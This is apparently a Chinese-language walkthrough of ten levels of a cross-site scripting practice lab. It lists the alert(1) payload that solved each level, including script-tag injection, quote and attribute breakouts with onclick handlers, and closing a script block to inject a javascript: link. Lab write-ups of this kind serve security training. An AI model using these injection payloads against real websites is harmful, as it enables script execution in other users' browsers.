case 01:
先在每个框里都输入:<script>alert(1)</script>
检查源码
这里第三个和第四个点都被处理过了,所以先考虑第一个和第二个点
这里试了一下,发现GET也能传参,所以构造
成功
case 02:
这里发现变量a和这个似乎有关联,试一下构造:a=<script>alert(1)</script>
成功
case 03:
这两者似乎有关联,尝试构造:b1=<script>alert(1)</script>
然后再构造:b1="><script>alert(1)</script>//
成功
case 04:
与上一题相同的想法,尝试构造:<script>alert(1)</script>
检查源码
构造:'><script>alert(1)</script>//
成功
case 05:
不做赘述了,检查源码
过滤了>
构造:"οnclick=alert(1)//
case06:
按照提示,尝试b4
过滤了>,构造:'οnclick=alert(1)//
搞定
case 07:
按照提示
检查源码
构造'alert(1)//
这里单引号被过滤了
尝试实体编码后再URL编码
构造:%26%23x0027%3Balert(1)//
没反应
尝试一种新方法:</script><a href=javascript:alert(1)>1</a>
解释一下:</script>中断script代码块,<a href=javascript:alert(1)>1</a>伪标签
搞↗定↘
case 08:
先观察源代码:
尝试:"<script>alert(1)</script>
发现双引号被过滤了,但是我们发现</script>似乎起作用了,尝试上一关的方法
构造:</script><a href=javascript:alert(1)>a</a>//
过啦!
case 09:
老规矩:'<script>alert(1)</script>//
单引号可以,但是<被过滤了
直接:';alert(1);//
搞定
case 10:
再来:"<script>alert(1)</script>//
双引号没过滤,但过滤了<和上一关一样:";alert(1);//
过了
